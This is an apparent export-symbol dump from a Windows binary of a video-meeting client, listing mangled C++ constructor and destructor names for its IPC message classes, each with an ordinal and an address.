              ??0CSBMBMessage_Assistant_Virtual_Audio_Register_Capturer_Proxy_Response@@QAE@XZ3840x41f720
              ??0CSBMBMessage_Assistant_Virtual_Audio_Start_Capture_Response@@QAE@XZ3850x41f660
              ??0CSBMBMessage_Assistant_Virtual_Audio_Stop_Capture_Response@@QAE@XZ3860x41f6c0
              ??0CSBMBMessage_Assistant_Voice_Command_Action_Request@@QAE@XZ3870x424530
              ??0CSBMBMessage_Assistant_Voice_Command_Data_Request@@QAE@XZ3880x424300
              ??0CSBMBMessage_Assistant_Voice_Command_Data_Response@@QAE@XZ3890x424360
              ??0CSBMBMessage_Assistant_Voice_Command_Start_Request@@QAE@XZ3900x424200
              ??0CSBMBMessage_Assistant_Voice_Command_Status_Notification@@QAE@XZ3910x424590
              ??0CSBMBMessage_Assistant_Voice_Command_UI_Update_Request@@QAE@XZ3920x4243c0
              ??0CSBMBMessage_Audio3rdSDK_AudioCmdNotify@@QAE@XZ3930x4215e0
              ??0CSBMBMessage_Audio3rdSDK_AudioCmdRequest@@QAE@XZ3940x421580
              ??0CSBMBMessage_AudioFacilityStatus@@QAE@XZ3950x420c60
              ??0CSBMBMessage_AvatarDataRequest@@QAE@XZ3960x427b40
              ??0CSBMBMessage_AvatarDataResponse@@QAE@XZ3970x427ba0
              ??0CSBMBMessage_CCIScreenRecordingNotify@@QAE@XZ3980x4230a0
              ??0CSBMBMessage_CCIScreenRecordingRequest@@QAE@XZ3990x423020
              ??0CSBMBMessage_CCIVideoAssignAndNotify@@QAE@XZ4000x423a20
              ??0CSBMBMessage_CCIVideoAudioChangeNotify@@QAE@XZ4010x422ab0
              ??0CSBMBMessage_CCIVideoCancelInviteByPhoneRequest@@QAE@XZ4020x422870
              ??0CSBMBMessage_CCIVideoChangeBtnStatusRequest@@QAE@XZ4030x422f60
              ??0CSBMBMessage_CCIVideoChangeHostRequest@@QAE@XZ4040x4238a0
              ??0CSBMBMessage_CCIVideoChangeRecordStatusRequest@@QAE@XZ4050x422fc0
              ??0CSBMBMessage_CCIVideoCreateEmbedWindowNotify@@QAE@XZ4060x4235b0
              ??0CSBMBMessage_CCIVideoCreateEmbedWindowRequest@@QAE@XZ4070x4231c0
              ??0CSBMBMessage_CCIVideoDestroyEmbedWindowNotify@@QAE@XZ4080x423620
              ??0CSBMBMessage_CCIVideoDestroyEmbedWindowRequest@@QAE@XZ4090x423350
              ??0CSBMBMessage_CCIVideoEmbedWindowSendMsgRequest@@QAE@XZ4100x4233b0
              ??0CSBMBMessage_CCIVideoEndDropDownClickBtnNotify@@QAE@XZ4110x423840
              ??0CSBMBMessage_CCIVideoEndDropdownButtonClickConfirmRequest@@QAE@XZ4120x4234f0
              ??0CSBMBMessage_CCIVideoEndVideoNotify@@QAE@XZ4130x4220c0
              ??0CSBMBMessage_CCIVideoEndVideoRequest@@QAE@XZ4140x422320
              ??0CSBMBMessage_CCIVideoEventReportNotify@@QAE@XZ4150x423ae0
              ??0CSBMBMessage_CCIVideoGetCurrentUserRequest@@QAE@XZ4160x422380
              ??0CSBMBMessage_CCIVideoGetCurrentUserResponse@@QAE@XZ4170x4223e0
              ??0CSBMBMessage_CCIVideoGetSupportCountryInfoRequest@@QAE@XZ4180x4228d0
              ??0CSBMBMessage_CCIVideoGetSupportCountryInfoResponse@@QAE@XZ4190x422930
              ??0CSBMBMessage_CCIVideoGetUserListRequest@@QAE@XZ4200x422440
              ??0CSBMBMessage_CCIVideoGetUserListResponse@@QAE@XZ4210x4224a0
              ??0CSBMBMessage_CCIVideoHoldStatusChangeNotify@@QAE@XZ4220x423900
              ??0CSBMBMessage_CCIVideoHostChangeNotify@@QAE@XZ4230x423a80
              ??0CSBMBMessage_CCIVideoInviteByPhoneRequest@@QAE@XZ4240x4227a0
              ??0CSBMBMessage_CCIVideoInviteByPhoneStatusNotify@@QAE@XZ4250x422810
              ??0CSBMBMessage_CCIVideoJoinMeetingRequest@@QAE@XZ4260x421f10
              ??0CSBMBMessage_CCIVideoJoinMeetingResponse@@QAE@XZ4270x421f70
              ??0CSBMBMessage_CCIVideoMuteAudioRequest@@QAE@XZ4280x422560
              ??0CSBMBMessage_CCIVideoOnClosedCaptionChanged@@QAE@XZ4290x423b40
              ??0CSBMBMessage_CCIVideoOnEmbedWindowSendMsgRequest@@QAE@XZ4300x423700
              ??0CSBMBMessage_CCIVideoOnLiveCaptionChange@@QAE@XZ4310x422dc0
              ??0CSBMBMessage_CCIVideoOnLiveTranscriptionMsgError@@QAE@XZ4320x422ca0
              ??0CSBMBMessage_CCIVideoOnLiveTranscriptionMsgReceived@@QAE@XZ4330x422b70
              ??0CSBMBMessage_CCIVideoOnLiveTranscriptionStatusNotify@@QAE@XZ4340x422b10
              ??0CSBMBMessage_CCIVideoOnUserJoinNotify@@QAE@XZ4350x422680
              ??0CSBMBMessage_CCIVideoOnUserLeaveNotify@@QAE@XZ4360x4226e0
              ??0CSBMBMessage_CCIVideoOnUserUpdatedNotify@@QAE@XZ4370x422740
              ??0CSBMBMessage_CCIVideoOpenURLWithDefaultBrowser@@QAE@XZ4380x423780
              ??0CSBMBMessage_CCIVideoPTQuitNotify@@QAE@XZ4390x423c40
              ??0CSBMBMessage_CCIVideoReceiveCommandNotify@@QAE@XZ4400x423d00
              ??0CSBMBMessage_CCIVideoRecordingStateChangeNotify@@QAE@XZ4410x422130
              ??0CSBMBMessage_CCIVideoRemoveUserRequest@@QAE@XZ4420x422500
              ??0CSBMBMessage_CCIVideoSendCommandRequest@@QAE@XZ4430x423ca0
              ??0CSBMBMessage_CCIVideoSetDomainRequest@@QAE@XZ4440x422990
              ??0CSBMBMessage_CCIVideoSetEndButtonDropdowRequest@@QAE@XZ4450x423490
              ??0CSBMBMessage_CCIVideoSetEndButtonTextRequest@@QAE@XZ4460x423430
              ??0CSBMBMessage_CCIVideoSetFullScreenRequest@@QAE@XZ4470x423550
              ??0CSBMBMessage_CCIVideoSetVBRequest@@QAE@XZ4480x4229f0
              ??0CSBMBMessage_CCIVideoSettingsSyncFromPTRequest@@QAE@XZ4490x4222b0
              ??0CSBMBMessage_CCIVideoSettingsSyncToPTRequest@@QAE@XZ4500x422190
              ??0CSBMBMessage_CCIVideoShowEmbedWindowNotify@@QAE@XZ4510x423690
              ??0CSBMBMessage_CCIVideoShowEmbedWindowRequest@@QAE@XZ4520x4232e0
              ??0CSBMBMessage_CCIVideoUseAudioRequest@@QAE@XZ4530x422a50
              ??0CSBMBMessage_CCIVideoUserDataUpdateNotify@@QAE@XZ4540x4237e0
              ??0CSBMBMessage_CCIVideoWarmTransferNotify@@QAE@XZ4550x4239c0
              ??0CSBMBMessage_CCIVideoWarmTransferRequest@@QAE@XZ4560x423960
              ??0CSBMBMessage_CDNEventIndication@@QAE@XZ4570x4264c0
              ??0CSBMBMessage_CameraControlGroupAdded@@QAE@XZ4580x427960
              ??0CSBMBMessage_CameraControlGroupFetched@@QAE@XZ4590x427900
              ??0CSBMBMessage_CameraControlGroupRemoved@@QAE@XZ4600x4279c0
              ??0CSBMBMessage_CancelDownloadComponent@@QAE@XZ4610x426e70
              ??0CSBMBMessage_ChatWithBuddy@@QAE@XZ4620x424660
              ??0CSBMBMessage_CheckInSessionReq@@QAE@XZ4630x425cf0
              ??0CSBMBMessage_CheckInSessionRsp@@QAE@XZ4640x425e10
              ??0CSBMBMessage_CheckNomadic911_Notification@@QAE@XZ4650x420780
              ??0CSBMBMessage_Client3rdSDK_SDKCmdNotify@@QAE@XZ4660x4216a0
              ??0CSBMBMessage_Client3rdSDK_SDKCmdRequest@@QAE@XZ4670x421640
              ??0CSBMBMessage_CompanionTokenRequest@@QAE@XZ4680x425770
              ??0CSBMBMessage_CompanionTokenResponse@@QAE@XZ4690x4257e0
              ??0CSBMBMessage_ComponentDownloadResult@@QAE@XZ4700x426f30
              ??0CSBMBMessage_ConfGetZRMeetingInfoReq@@QAE@XZ4710x425420
              ??0CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterRequest@@QAE@XZ4720x41c5f0
              ??0CSBMBMessage_ConfInterProcessAudioSharingServiceRegisterResponse@@QAE@XZ4730x41c650
              ??0CSBMBMessage_ConfInterProcessAudioSharingServiceUnregisterResponse@@QAE@XZ4740x41c7d0
              ??0CSBMBMessage_ConfirmConfLeave@@QAE@XZ4750x4199c0
              ??0CSBMBMessage_ConfirmRecaptcha@@QAE@XZ4760x41ba30
              ??0CSBMBMessage_Doc2ImgCancelConvertRequest@@QAE@XZ4770x4214c0
              ??0CSBMBMessage_Doc2ImgCancelConvertResponse@@QAE@XZ4780x421520
              ??0CSBMBMessage_Doc2ImgConvertFinish@@QAE@XZ4790x4213b0
              ??0CSBMBMessage_Doc2ImgConvertProgress@@QAE@XZ4800x421210
              ??0CSBMBMessage_Doc2ImgStartConvertRequest@@QAE@XZ4810x420fd0
              ??0CSBMBMessage_Doc2ImgStartConvertResponse@@QAE@XZ4820x4210f0
              ??0CSBMBMessage_DocsShareStartMeetingCollaboratorsInviteInfo@@QAE@XZ4830x427cc0
              ??0CSBMBMessage_ECDNInfo@@QAE@XZ4840x424b50
              ??0CSBMBMessage_ECDNSetBackupSuperNodeInfo@@QAE@XZ4850x424c10
              ??0CSBMBMessage_ECDNUpdateSuperNodeMaxLoad@@QAE@XZ4860x424bb0
              ??0CSBMBMessage_EnableQualtricsFeedback@@QAE@XZ4870x427470
              ??0CSBMBMessage_EnableSubscribePresence@@QAE@XZ4880x424d30
              ??0CSBMBMessage_GetPresence@@QAE@XZ4890x424a30
              ??0CSBMBMessage_GetPresenceResponse@@QAE@XZ4900x424a90
              ??0CSBMBMessage_HeartBeatRequest@@QAE@XZ4910x420060
              ??0CSBMBMessage_HuddlesOnShowAvatarStateChange@@QAE@XZ4920x427d80
              ??0CSBMBMessage_IGotIt@@QAE@XZ4930x417da0
              ??0CSBMBMessage_IPCSDK_SDKCmdNotify@@QAE@XZ4940x421770
              ??0CSBMBMessage_IPCSDK_SDKCmdRequest@@QAE@XZ4950x421700
              ??0CSBMBMessage_InitThread@@QAE@XZ4960x4177d0
              ??0CSBMBMessage_InitUserPolicySettings@@QAE@XZ4970x41c1c0
              ??0CSBMBMessage_InviteBuddyToMeeting@@QAE@XZ4980x424900
              ??0CSBMBMessage_InviteRoomSystemResult@@QAE@XZ4990x419160
              ??0CSBMBMessage_InviteWinStatus@@QAE@XZ5000x419010
              ??0CSBMBMessage_InviteZoomPhoneTokenRequest@@QAE@XZ5010x425540
              ??0CSBMBMessage_InviteZoomPhoneTokenResponse@@QAE@XZ5020x4255a0
              ??0CSBMBMessage_InviteeCredRequest@@QAE@XZ5030x423ef0
              ??0CSBMBMessage_InviteeCredResponse@@QAE@XZ5040x423f50
              ??0CSBMBMessage_InviteeIakRequest@@QAE@XZ5050x423e90
              ??0CSBMBMessage_InviteeIakResponse@@QAE@XZ5060x424060
              ??0CSBMBMessage_JoinCompliantMeetingAutoCall@@QAE@XZ5070x426b80
              ??0CSBMBMessage_KeepAlive@@QAE@XZ5080x4196d0
              ??0CSBMBMessage_LCPRecordOperate@@QAE@XZ5090x424180
              ??0CSBMBMessage_LeaveBeforeMeetingStartNotify@@QAE@XZ5100x420960
              ??0CSBMBMessage_LeaveConfErrorDesc@@QAE@XZ5110x419de0
              ??0CSBMBMessage_LogService_StartChannel@@QAE@XZ5120x4207e0
              ??0CSBMBMessage_LogService_StopChannel@@QAE@XZ5130x420840
              ??0CSBMBMessage_LogService_SubChannelAdd@@QAE@XZ5140x4208a0
              ??0CSBMBMessage_LogService_SubChannelRemove@@QAE@XZ5150x420900
              ??0CSBMBMessage_MakeCallLogInfo@@QAE@XZ5160x424d90
              ??0CSBMBMessage_MediaAPIRequest@@QAE@XZ5170x41c350
              ??0CSBMBMessage_MediaAPIResponse@@QAE@XZ5180x41c470
              ??0CSBMBMessage_MeetingCacheBytesKVOperate@@QAE@XZ5190x41ca70
              ??0CSBMBMessage_MeetingDiagInfo@@QAE@XZ5200x427780
              ??0CSBMBMessage_MeetingPAAPToggleEvent@@QAE@XZ5210x424720
              ??0CSBMBMessage_MeetingWallpaperStartDownload@@QAE@XZ5220x4274d0
              ??0CSBMBMessage_MeetingWallpaperThumbStartDownload@@QAE@XZ5230x4275f0
              ??0CSBMBMessage_MeshNotification@@QAE@XZ5240x424c70
              ??0CSBMBMessage_MyMeetingStatus@@QAE@XZ5250x424120
              ??0CSBMBMessage_NotifyActivateConf@@QAE@XZ5260x419610
              ??0CSBMBMessage_NotifyAfterInit@@QAE@XZ5270x417950
              ??0CSBMBMessage_NotifyAfterObjCreated@@QAE@XZ5280x4179b0
              ??0CSBMBMessage_NotifyAppActive@@QAE@XZ5290x417ad0
              ??0CSBMBMessage_NotifyAppEvent@@QAE@XZ5300x417cb0
              ??0CSBMBMessage_NotifyAppInActive@@QAE@XZ5310x417b30
              ??0CSBMBMessage_NotifyAssistantStart@@QAE@XZ5320x41c8f0
              ??0CSBMBMessage_NotifyAssistantStop@@QAE@XZ5330x41c950
              ??0CSBMBMessage_NotifyBandwidthLimitUpdate@@QAE@XZ5340x420180
              ??0CSBMBMessage_NotifyBeforeObjDestroyed@@QAE@XZ5350x417a70
              ??0CSBMBMessage_NotifyBeforeTerm@@QAE@XZ5360x417a10
              ??0CSBMBMessage_NotifyCallCommand@@QAE@XZ5370x418a10
              ??0CSBMBMessage_NotifyChangeBargeEmergencyCallStatus@@QAE@XZ5380x421840
              ??0CSBMBMessage_NotifyCheckUpdateResponse@@QAE@XZ5390x427030
              ??0CSBMBMessage_NotifyClaimHost@@QAE@XZ5400x41acf0
              ??0CSBMBMessage_NotifyClientRegistry@@QAE@XZ5410x417890
              ??0CSBMBMessage_NotifyClientUnRegistry@@QAE@XZ5420x4178f0
              ??0CSBMBMessage_NotifyConfPListChanged@@QAE@XZ5430x418b10
              ??0CSBMBMessage_NotifyConfSelected@@QAE@XZ5440x4195b0
              ??0CSBMBMessage_NotifyConfStart@@QAE@XZ5450x418310
              ??0CSBMBMessage_NotifyConfStop@@QAE@XZ5460x418450
              ??0CSBMBMessage_NotifyConfTokenResult@@QAE@XZ5470x424f30
              ??0CSBMBMessage_NotifyConfZRMeetingInfo@@QAE@XZ5480x4253b0
              ??0CSBMBMessage_NotifyConferenceStatus@@QAE@XZ5490x4186c0
              ??0CSBMBMessage_NotifyCustom3DAvatarFileIdUpdated@@QAE@XZ5500x41b7a0
              ??0CSBMBMessage_NotifyDeviceReady@@QAE@XZ5510x41a400
              ??0CSBMBMessage_NotifyDownloadProgress@@QAE@XZ5520x426ed0
              ??0CSBMBMessage_NotifyEndSetting@@QAE@XZ5530x418f10
              ??0CSBMBMessage_NotifyInvitationSent@@QAE@XZ5540x419960
              ??0CSBMBMessage_NotifyInviteFBBuddy@@QAE@XZ5550x418550
              ??0CSBMBMessage_NotifyJoinByMeetingNumber@@QAE@XZ5560x419550
              ??0CSBMBMessage_NotifyJoinFailForForceUpdate@@QAE@XZ5570x41abc0
              ??0CSBMBMessage_NotifyLeaveConf@@QAE@XZ5580x419670
              ??0CSBMBMessage_NotifyMeetingCallResponse@@QAE@XZ5590x426be0
              ??0CSBMBMessage_NotifyMeetingCustom3DAvatarElementThumbnailDownloaded@@QAE@XZ5600x41b370
              ??0CSBMBMessage_NotifyMeetingEmojiDownloadStatus@@QAE@XZ5610x41b920
              ??0CSBMBMessage_NotifyMeetingFaceMakeupDownloaded@@QAE@XZ5620x41b270
              ??0CSBMBMessage_NotifyMeetingImageDownloaded@@QAE@XZ5630x41b150
              ??0CSBMBMessage_NotifyMeetingParamChanged@@QAE@XZ5640x418040
              ??0CSBMBMessage_NotifyMeetingWallpaperDownloadStatus@@QAE@XZ5650x427660
              ??0CSBMBMessage_NotifyNetworkStateChanged@@QAE@XZ5660x417b90
              ??0CSBMBMessage_NotifyNetworkSwitch@@QAE@XZ5670x41c590
              ??1?$CmmMessageTemplate_7@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@@Archive@Cmm@@UAE@XZ9950x42dff0
              ??1?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@III@Archive@Cmm@@UAE@XZ9960x42c000
              ??1?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@V12@V12@I@Archive@Cmm@@UAE@XZ9970x42ed80
              ??1?$CmmMessageTemplate_7@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@@Archive@Cmm@@UAE@XZ9980x4287a0
              ??1?$CmmMessageTemplate_7@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@UAE@XZ9990x42c700
              ??1?$CmmMessageTemplate_7@V?$CStringT@D@Cmm@@V?$CStringT@_W@2@V32@V32@V32@V32@V32@@Archive@Cmm@@UAE@XZ10000x4298a0
              ??1?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@HHHHHH@Archive@Cmm@@UAE@XZ10010x429bb0
              ??1?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@HIIV12@V12@V12@@Archive@Cmm@@UAE@XZ10020x42a8f0
              ??1?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IHIHV12@H@Archive@Cmm@@UAE@XZ10030x42eae0
              ??1?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IV12@V12@II_J@Archive@Cmm@@UAE@XZ10040x42a190
              ??1?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_J@Archive@Cmm@@UAE@XZ10050x428e80
              ??1?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@HHHHV12@@Archive@Cmm@@UAE@XZ10060x42ced0
              ??1?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HH@Archive@Cmm@@UAE@XZ10070x429630
              ??1?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@UAE@XZ10080x42f980
              ??1?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@H@Archive@Cmm@@UAE@XZ10090x42f120
              ??1?$CmmMessageTemplate_7@_JV?$CStringT@D@Cmm@@IV12@V12@HH@Archive@Cmm@@UAE@XZ10100x42b550
              ??1?$CmmMessageTemplate_7@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@@Archive@Cmm@@UAE@XZ10110x42ae20
              ??1?$CmmMessageTemplate_7@_JV?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@UAE@XZ10120x42d180
              ??1?$CmmMessageTemplate_8@HHHV?$CStringT@_W@Cmm@@V12@HV12@V12@@Archive@Cmm@@UAE@XZ10130x42ca10
              ??1?$CmmMessageTemplate_8@HHHV?$CStringT@_W@Cmm@@V12@V12@V12@H@Archive@Cmm@@UAE@XZ10140x429020
              ??1?$CmmMessageTemplate_8@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@@Archive@Cmm@@UAE@XZ10150x42dee0
              ??1?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@IIII@Archive@Cmm@@UAE@XZ10160x42bf30
              ??1?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@V12@@Archive@Cmm@@UAE@XZ10170x428690
              ??1?$CmmMessageTemplate_8@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@UAE@XZ10180x42c5f0
              ??1?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@HIIV12@V12@V12@V12@@Archive@Cmm@@UAE@XZ10190x42a7e0
              ??1?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IHIHV12@H_K@Archive@Cmm@@UAE@XZ10200x42ea00
              ??1?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IV12@V12@II_JI@Archive@Cmm@@UAE@XZ10210x42a0c0
              ??1?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JH@Archive@Cmm@@UAE@XZ10220x428db0
              ??1?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@HHHHV12@H@Archive@Cmm@@UAE@XZ10230x42ce00
              ??1?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@@Archive@Cmm@@UAE@XZ10240x429520
              ??1?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@UAE@XZ10250x42f870
              ??1?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@HH@Archive@Cmm@@UAE@XZ10260x42f050
              ??1?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@IV12@V12@HH_J@Archive@Cmm@@UAE@XZ10270x42b470
              ??1?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@@Archive@Cmm@@UAE@XZ10280x42ad10
              ??1?$CmmMessageTemplate_9@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@@Archive@Cmm@@UAE@XZ10290x42ddd0
              ??1?$CmmMessageTemplate_9@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@H@Archive@Cmm@@UAE@XZ10300x42c520
              ??1?$CmmMessageTemplate_9@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@UAE@XZ10310x42c340
              ??1?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@IHIHV12@H_KH@Archive@Cmm@@UAE@XZ10320x42e930
              ??1?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHH@Archive@Cmm@@UAE@XZ10330x428ce0
              ??1?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@V12@@Archive@Cmm@@UAE@XZ10340x429410
              ??1?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@UAE@XZ10350x42f760
              ??1?$CmmMessageTemplate_9@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@V12@@Archive@Cmm@@UAE@XZ10360x42ac00
              ??1CCmmArchiveObjHelper@Cmm@@QAE@XZ10370x452a20
              ??1CCmmArchivePackageTree@Archive@Cmm@@UAE@XZ10380x454f80
              ??1CCmmArchivePath@Cmm@@QAE@XZ10390x459c30
              ??1CCmmArchiveServiceImp@Archive@Cmm@@QAE@XZ10400x4552d0
              ??1CCmmArchiveTreeNode@Archive@Cmm@@UAE@XZ10410x4586a0
              ??1CCmmArchiveVarivant@Cmm@@QAE@XZ10420x459890
              ??1CCmmPerfTelemetry@@QAE@XZ10430x402f90
              ??1CCmmPerfTelemetryEventWOStack@@QAE@XZ10440x464f40
              ??1CCmmPerfTelemetryEventWStack@@QAE@XZ10450x464dd0
              ??1CCmmPerfTelemetryLog@@QAE@XZ10460x465190
              ??1CCmmPerfTelemetryStacks@@QAE@XZ10470x465060
              ??1CCritical@Cmm@@QAE@XZ10480x40c770
              ??1CEvent@Cmm@@QAE@XZ10490x40c240
              ??1CFile@Cmm@@QAE@XZ10500x411470
              ??1CFileName@Cmm@@UAE@XZ10510x402420
              ??1CIPCChannelThread@ssb_ipc@@UAE@XZ10520x4280b0
              ??1CMutex@Cmm@@QAE@XZ10530x4170d0
              ??1CPU@Cmm@@QAE@XZ10540x44bce0
              ??1CRefThread@Cmm@@UAE@XZ10550x4173d0
              ??1CSBMBMessage_AddClientLog@@UAE@XZ10560x4198b0
              ??1CSBMBMessage_AddToCameraControlGroup@@UAE@XZ10570x417e00
              ??1CSBMBMessage_AppSupportNewWhiteBoardSetting@@UAE@XZ10580x41b2d0
              ??1CSBMBMessage_Assisant_Keybase@@UAE@XZ10590x40c940
              ??1CSBMBMessage_Assistant_Audio_Configure_Request@@UAE@XZ10600x40c940
              ??1CSBMBMessage_Assistant_Audio_Configure_Response@@UAE@XZ10610x41ad50
              ??1CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Request@@UAE@XZ10620x41fab0
              ??1CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@UAE@XZ10630x41fbd0
              ??1CSBMBMessage_Assistant_Broadcast_Clear_All_Audio_From_Txchannel_Response@@UAE@XZ10640x418f70
              ??1CSBMBMessage_Assistant_Broadcast_Network_Audio_Config_Proxy_Request@@UAE@XZ10650x41f8d0
              ??1CSBMBMessage_Assistant_Broadcast_Network_Audio_Config_Proxy_Response@@UAE@XZ10660x4184b0
              ??1CSBMBMessage_Assistant_Broadcast_Network_Audio_Stop_Proxy_Response@@UAE@XZ10670x418f70
              ??1CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Request@@UAE@XZ10680x41fce0
              ??1CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Response@@UAE@XZ10690x41fdf0
              ??1CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Request@@UAE@XZ10700x41ad50
              ??1CSBMBMessage_Assistant_Broadcast_Unbind_Channel_Audio_Response@@UAE@XZ10710x41ffc0
              ??1CSBMBMessage_Assistant_CEC_LoadResponse@@UAE@XZ10720x418f70
              ??1CSBMBMessage_Assistant_CEC_PowerOnResponse@@UAE@XZ10730x41ad50
              ??1CSBMBMessage_Assistant_CEC_StandByResponse@@UAE@XZ10740x41ad50
              ??1CSBMBMessage_Assistant_CEC_UnloadResponse@@UAE@XZ10750x41ad50
              ??1CSBMBMessage_Assistant_ControlSystem_CallDeviceSucceedNotify@@UAE@XZ10760x417e00
              ??1CSBMBMessage_Assistant_ControlSystem_DevicesPreparedNotify@@UAE@XZ10770x41ba90
              ??1CSBMBMessage_Assistant_ControlSystem_DevicesUpdatedNotify@@UAE@XZ10780x417e00
              ??1CSBMBMessage_Assistant_ControlSystem_DoOperationRequest@@UAE@XZ10790x41e320
              ??1CSBMBMessage_Assistant_ControlSystem_ExecuteRuleRequest@@UAE@XZ10800x417e00
              ??1CSBMBMessage_Assistant_ControlSystem_ExecuteSceneRequest@@UAE@XZ10810x417e00
              ??1CSBMBMessage_Assistant_ControlSystem_LoadRequest@@UAE@XZ10820x417e00
              ??1CSBMBMessage_Assistant_ControlSystem_ScenesPreparedNotify@@UAE@XZ10830x417e00
              ??1CSBMBMessage_Assistant_DAL_Service_Conf_Render_Change@@UAE@XZ10840x41eb70
              ??1CSBMBMessage_Assistant_DAL_Service_Get_Service_Status_Response@@UAE@XZ10850x418f70
              ??1CSBMBMessage_Assistant_DAL_Service_Identify_Device_Request@@UAE@XZ10860x417580
              ??1CSBMBMessage_Assistant_DAL_Service_Identify_Device_Response@@UAE@XZ10870x41ee00
              ??1CSBMBMessage_Assistant_DAL_Service_Load_Service_Request@@UAE@XZ10880x41e740
              ??1CSBMBMessage_Assistant_DAL_Service_Load_Service_Response@@UAE@XZ10890x41ad50
              ??1CSBMBMessage_Assistant_DAL_Service_Network_Device_Added_Notification@@UAE@XZ10900x40c940
              ??1CSBMBMessage_Assistant_DAL_Service_Network_Device_List_Refresh_Notification@@UAE@XZ10910x41f3c0
              ??1CSBMBMessage_Assistant_DAL_Service_Network_Device_Removed_Notification@@UAE@XZ10920x40c940
              ??1CSBMBMessage_Assistant_DAL_Service_Network_Device_Update_Notification@@UAE@XZ10930x40c940
              ??1CSBMBMessage_Assistant_DAL_Service_Service_Components_Change_Notification@@UAE@XZ10940x41eb70
              ??1CSBMBMessage_Assistant_DAL_Service_Service_Ready_Notification@@UAE@XZ10950x41f2a0
              ??1CSBMBMessage_Assistant_DAL_Service_Service_Refresh_Device_List_Request@@UAE@XZ10960x418f70
              ??1CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Request@@UAE@XZ10970x41e9e0
              ??1CSBMBMessage_Assistant_DAL_Service_Set_Selected_Device_Response@@UAE@XZ10980x41e9e0
              ??1CSBMBMessage_Assistant_DAL_Service_Sip_Audio_Render_Change_Notification@@UAE@XZ10990x41efe0
              ??1CSBMBMessage_Assistant_DAL_Service_Sip_Render_Change@@UAE@XZ11000x41efe0
              ??1CSBMBMessage_Assistant_DAL_Service_Unload_Service_Request@@UAE@XZ11010x40c940
              ??1CSBMBMessage_Assistant_DAL_Service_Unload_Service_Response@@UAE@XZ11020x41ad50
              ??1CSBMBMessage_Assistant_DAL_Service_Unset_Selected_Device_Request@@UAE@XZ11030x41eb70
              ??1CSBMBMessage_Assistant_DAL_Service_Unset_Selected_Device_Response@@UAE@XZ11040x41ec90
              ??1CSBMBMessage_Assistant_DAL_Service_Use_Dante_Controller@@UAE@XZ11050x41f0e0
              ??1CSBMBMessage_Assistant_Exit_Process@@UAE@XZ11060x418f70
              ??1CSBMBMessage_Assistant_LineCallMergedNotification@@UAE@XZ11070x41d1a0
              ??1CSBMBMessage_Assistant_SIP_AudioDeviceFailNotification@@UAE@XZ11080x41ad50
              ??1CSBMBMessage_Assistant_SIP_AutoRecordingEvent@@UAE@XZ11090x41d620
              ??1CSBMBMessage_Assistant_SIP_CallOperationFailNotification@@UAE@XZ11100x41ce10
              ??1CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotification@@UAE@XZ11110x41d1a0
              ??1CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotificationWithCallID@@UAE@XZ11120x41a2f0
              ??1CSBMBMessage_Assistant_SIP_CheckNomadic911Request@@UAE@XZ11130x40c940
              ??1CSBMBMessage_Assistant_SIP_JoinMeetingRequest@@UAE@XZ11140x41d950
              ??1CSBMBMessage_Assistant_SIP_LineCallTerminatedNotification@@UAE@XZ11150x40c940
